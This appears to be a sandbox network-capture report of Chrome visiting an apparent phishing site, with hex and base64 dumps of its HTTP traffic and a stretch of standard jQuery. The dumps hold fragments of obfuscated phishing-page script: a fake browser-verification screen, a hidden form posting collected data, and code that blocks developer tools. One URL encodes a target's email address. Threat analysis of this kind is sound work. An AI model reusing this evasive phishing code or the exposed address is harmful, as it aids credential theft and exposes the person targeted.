                                                                  2025-01-13 21:52:27 UTC1369INData Raw: 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d
                                                                  Data Ascii: ogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3M
                                                                  2025-01-13 21:52:27 UTC1369INData Raw: 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 47 78 57 56 32 68 42 5a 57 56 42 53 6b 73 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 47 78 57 56 32 68 42 5a 57 56 42 53 6b 73 67 4c 53 42 6a 55 56 70 30 64 45 70 46 54 46 68 54 49 44 34 67 63 46 42 79 54 47 46 4c 59 6b 5a 69 62 43 41 6d 4a 69 41 68 61 57 46 52 64 45 4a 6e 55 31 46 6c 52 69 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 61 6b 31 6c 61 30 46 58 5a 47 52 7a 62 69 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 70 59 56 46 30 51 6d 64 54 55 57 56 47 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43
                                                                  Data Ascii: idWdnZXI7DQogICAgICAgIGNvbnN0IGxWV2hBZWVBSksgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKGxWV2hBZWVBSksgLSBjUVp0dEpFTFhTID4gcFByTGFLYkZibCAmJiAhaWFRdEJnU1FlRikgew0KICAgICAgICAgICAgak1la0FXZGRzbiA9IHRydWU7DQogICAgICAgICAgICBpYVF0QmdTUWVGID0gdHJ1ZTsNCiAgIC
                                                                  2025-01-13 21:52:27 UTC1369INData Raw: 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 64 47 56 34 64 43 31 6a 5a 57 35 30 5a 58 49 69 49 47 6c 6b 50 53 4a 56 64 6d 39 6b 52 6c 4a 53 5a 33 70 4c 49 6a 34 4e 43 6c 5a 6c 63 6d 6c 6d 65 57 6c 75 5a 79 42 35 62 33 56 79 49 47 4a 79 62 33 64 7a 5a 58 49 67 5a 6d 39 79 49 47 45 67 63 32 56 6a 64 58 4a 6c 49 47 4a 79 62 33 64 7a 61 57 35 6e 49 47 56 34 63 47 56 79 61 57 56 75 59 32 55 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77
                                                                  Data Ascii: DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGRhdGEiIG5hbWU9ImJsdGRkYXRhIiB2YWx1ZT0iIj4NCjwvZm9ybT4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0idGV4dC1jZW50ZXIiIGlkPSJVdm9kRlJSZ3pLIj4NClZlcmlmeWluZyB5b3VyIGJyb3dzZXIgZm9yIGEgc2VjdXJlIGJyb3dzaW5nIGV4cGVyaWVuY2UuDQo8L2Rpdj4NCjw
                                                                  2025-01-13 21:52:27 UTC1369INData Raw: 31 4e 43 52 79 77 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 74 5a 58 52 6f 62 32 51 36 49 43 4a 51 54 31 4e 55 49 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 59 6d 39 6b 65 54 6f 67 62 6d 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 47 74 7a 51 6e 68 72 5a 46 70 44 56 6d 59 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52 68 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a 4a 31 30 67 50 54 30 67 4a 33 4e 31 59 32 4e 6c
                                                                  Data Ascii: 1NCRywgew0KICAgICAgICBtZXRob2Q6ICJQT1NUIiwNCiAgICAgICAgYm9keTogbmV3IEZvcm1EYXRhKGtzQnhrZFpDVmYpDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYXRhID0+IHsNCiAgICAgICAgaWYoZGF0YVsnc3RhdHVzJ10gPT0gJ3N1Y2Nl
                                                                  2025-01-13 21:52:27 UTC1369INData Raw: 20 69 73 20 74 68 65 20 61 76 65 72 61 67 65 20 6d 61 6e 2c 20 77 69 74 68 20 6c 61 73 65 72 2d 6c 69 6b 65 20 66 6f 63 75 73 2e 20 2a 2f 0d 0a 69 66 28 43 66 52 74 77 42 44 71 4e 7a 20 3d 3d 20 69 51 67 73 44 47 68 6c 4c 46 29 7b 0d 0a 63 6f 6e 73 74 20 44 50 4e 42 72 6c 61 41 47 49 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 4d 73 55 6a 6c 4d 6d 53 6f 69 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 4d 73 55 6a 6c 4d 6d 53 6f 69 2e 70 61 74 68 6e 61 6d 65 20 3d 20 4d 73 55 6a 6c 4d 6d 53 6f 69 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d
                                                                  Data Ascii: is the average man, with laser-like focus. */if(CfRtwBDqNz == iQgsDGhlLF){const DPNBrlaAGI = window.location.pathname.split('%23')[0].split('%3F')[0];if (MsUjlMmSoi.pathname.endsWith('/')) {MsUjlMmSoi.pathname = MsUjlMmSoi.pathname.slice(0, -1);
                                                                  2025-01-13 21:52:27 UTC1369INData Raw: 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 4a 72 54 6c 4e 61 61 33 4e 57 65 57 6b 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 51 6d 74 4f 55 31 70 72 63 31 5a 35 61 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 4a 72 54 6c 4e 61 61 33 4e 57 65 57 6b 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 7a 4a 77 65 44 73 76 4b 6e 64 70 5a 48
                                                                  Data Ascii: hbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0JrTlNaa3NWeWkgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojQmtOU1prc1Z5aSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0JrTlNaa3NWeWkuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMzJweDsvKndpZH
                                                                  2025-01-13 21:52:27 UTC1369INData Raw: 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42
                                                                  Data Ascii: dy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICB


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.449750103.83.194.554435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:26 UTC631OUTGET /favicon.ico HTTP/1.1
                                                                  Host: ilikethislife.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:26 UTC164INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:52:26 GMT
                                                                  Server: Apache
                                                                  Content-Length: 315
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  2025-01-13 21:52:26 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.449753151.101.2.1374435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:28 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                  Host: code.jquery.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://rfll.yordickyel.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:28 UTC613INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 89501
                                                                  Server: nginx
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                  ETag: "28feccc0-15d9d"
                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                  Access-Control-Allow-Origin: *
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Accept-Ranges: bytes
                                                                  Age: 2289674
                                                                  Date: Mon, 13 Jan 2025 21:52:28 GMT
                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740064-EWR
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 2774, 0
                                                                  X-Timer: S1736805148.129523,VS0,VE1
                                                                  Vary: Accept-Encoding
                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                  2025-01-13 21:52:28 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
